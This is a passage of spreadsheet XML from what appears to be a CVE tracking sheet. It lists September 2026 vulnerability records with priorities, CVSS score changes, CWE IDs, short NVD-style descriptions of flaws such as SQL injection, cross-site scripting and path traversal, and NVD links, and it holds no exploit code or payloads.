          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q452" s="5" t="inlineStr"/>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S452" s="5" t="inlineStr">
        <is>
          <t>Cloudreve before 4.16.1 fails to properly sanitize file paths returned by remote downloaders, allowing authenticated users to create files outside the selected destination directory. Attackers can exploit path traversal sequences in downloader metadata to write files to unexpected locations within accessible namespaces.</t>
        </is>
      </c>
      <c r="T452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101051</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.1 → 2.3)</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101089</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="inlineStr"/>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr"/>
      <c r="K453" s="5" t="inlineStr"/>
      <c r="L453" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q453" s="5" t="inlineStr"/>
      <c r="R453" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S453" s="5" t="inlineStr">
        <is>
          <t>Nezha before 2.2.7 contains an information disclosure vulnerability in the GET /api/v1/profile endpoint that returns the bcrypt-hashed password field of authenticated users. Attackers can extract password hashes and perform offline cracking attacks without rate limiting or audit trail constraints.</t>
        </is>
      </c>
      <c r="T453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101089</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100877</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="inlineStr"/>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K454" s="5" t="inlineStr"/>
      <c r="L454" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P454" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q454" s="5" t="inlineStr"/>
      <c r="R454" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S454" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected by this vulnerability is an unknown functionality of the file registrationform.php. Executing a manipulation of the argument FName/LName/Addrs can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100877</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B455" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100878</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="inlineStr"/>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K455" s="5" t="inlineStr"/>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q455" s="5" t="inlineStr"/>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S455" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in zhistaredu StarTraining up to 3.8.1. Affected by this issue is the function SysUser.isAdmin of the file edu-common/src/main/java/com/edu/common/core/domain/entity/SysUser.java of the component authRole Endpoint. The manipulation of the argument userId/roleIds leads to authorization bypass. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100878</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100883</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="inlineStr"/>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K456" s="5" t="inlineStr"/>
      <c r="L456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q456" s="5" t="inlineStr"/>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="S456" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Krayin laravel-crm up to 2.2.5. The affected element is an unknown function of the file packages/Webkul/Admin/src/Config/acl.php. Executing a manipulation can lead to improper access controls. The attack can be launched remotely. The exploit has been published and may be used. Upgrading to version 2.2.6 is sufficient to fix this issue. This patch is called a399404a388d8ad2700a01349d0d98069c8e85a4. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100883</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100884</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="inlineStr"/>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K457" s="5" t="inlineStr"/>
      <c r="L457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q457" s="5" t="inlineStr"/>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>CWE-99</t>
        </is>
      </c>
      <c r="S457" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Krayin laravel-crm up to 2.2.5. The impacted element is the function Storage::download of the file packages/Webkul/Admin/src/Config/acl.php of the component attachment-download Endpoint. The manipulation of the argument ID leads to improper control of resource identifiers. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.2.6 is sufficient to resolve this issue. The identifier of the patch is 13d6988cda8d69ece45ee1890effc90a7f21cdc1. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100884</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100887</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="inlineStr"/>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K458" s="5" t="inlineStr"/>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q458" s="5" t="inlineStr"/>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S458" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in amirsanni Mini-Inventory-and-Sales-Management-System up to 81bf0b55f5933f3b0dbb1583204a612e06605b95. The impacted element is the function order_by of the file DB_query_builder.php of the component Database Query Builder. Performing a manipulation of the argument orderBy results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project maintainer confirms: "I stopped maintaining that project for a while now, so I'm not sure it's worth fixing." This vulnerability only affects products that are no longer supported by the maintainer.</t>
        </is>
      </c>
      <c r="T458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100887</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100898</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="inlineStr"/>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K459" s="5" t="inlineStr"/>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q459" s="5" t="inlineStr"/>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S459" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in DevaslanPHP project-management 1.2.1/1.2.2/1.2.3/1.2.4/2.0.0-beta1. This affects the function whereRaw of the file app/Filament/Widgets/Timesheet/ActivitiesReport.php of the component Timesheet Dashboard. Performing a manipulation of the argument filter results in sql injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100898</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100899</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="inlineStr"/>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K460" s="5" t="inlineStr"/>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q460" s="5" t="inlineStr"/>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S460" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in DevaslanPHP project-management 1.2.1/1.2.2/1.2.3/1.2.4/v2.0.0-beta1. This impacts the function whereRaw of the file app/Filament/Widgets/Timesheet/MonthlyReport.php of the component Timesheet Dashboard. Executing a manipulation of the argument filter can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100899</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.5 → 2.0)</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100880</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="inlineStr"/>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr"/>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q461" s="5" t="inlineStr"/>
      <c r="R461" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S461" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in zhistaredu StarTraining up to 3.8.1. This vulnerability affects unknown code of the file du-common/src/main/java/com/edu/common/utils/file/MimeTypeUtils.java of the component Upload Endpoint. This manipulation of the argument File causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100880</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (2.6 → 1.2)</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100881</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>1.2</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="inlineStr"/>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr"/>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q462" s="5" t="inlineStr"/>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S462" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in zhistaredu StarTraining up to 3.8.1. This issue affects some unknown processing of the file application.yml. Such manipulation of the argument xss.enabled leads to cross site scripting. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit has been disclosed publicly and may be used. Not independently exploitable: a defense-in-depth absence that amplifies CVE-2026-100880. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100881</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>Updated - Severity changed</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100655</t>
        </is>
      </c>
      <c r="D463" s="5" t="inlineStr"/>
      <c r="E463" s="5" t="inlineStr"/>
      <c r="F463" s="5" t="inlineStr"/>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="inlineStr"/>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr"/>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD, Vulnrichment</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q463" s="5" t="inlineStr"/>
      <c r="R463" s="5" t="inlineStr"/>
      <c r="S463" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="T463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100655</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>Updated - Severity changed</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100656</t>
        </is>
      </c>
      <c r="D464" s="5" t="inlineStr"/>
      <c r="E464" s="5" t="inlineStr"/>
      <c r="F464" s="5" t="inlineStr"/>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="inlineStr"/>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr"/>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD, Vulnrichment</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q464" s="5" t="inlineStr"/>
      <c r="R464" s="5" t="inlineStr"/>
      <c r="S464" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="T464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100656</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>Updated - Severity changed</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100657</t>
        </is>
      </c>
      <c r="D465" s="5" t="inlineStr"/>
      <c r="E465" s="5" t="inlineStr"/>
      <c r="F465" s="5" t="inlineStr"/>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="inlineStr"/>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr"/>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q465" s="5" t="inlineStr"/>
      <c r="R465" s="5" t="inlineStr"/>
      <c r="S465" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="T465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100657</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>Updated - Severity changed</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100658</t>
        </is>
      </c>
      <c r="D466" s="5" t="inlineStr"/>
      <c r="E466" s="5" t="inlineStr"/>
      <c r="F466" s="5" t="inlineStr"/>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="inlineStr"/>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr"/>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q466" s="5" t="inlineStr"/>
      <c r="R466" s="5" t="inlineStr"/>
      <c r="S466" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected as a duplicate.</t>
        </is>
      </c>
      <c r="T466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100658</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T466"/>
  <conditionalFormatting sqref="E2:E466">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466">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CVE-2026-101072</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr"/>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr"/>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Netcore NR289-GE 1.4.5102. This issue affects the function system of the file /ap_ip.cgi of the component CGI Handler. Such manipulation of the argument ip leads to os command injection. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101072</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101076</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
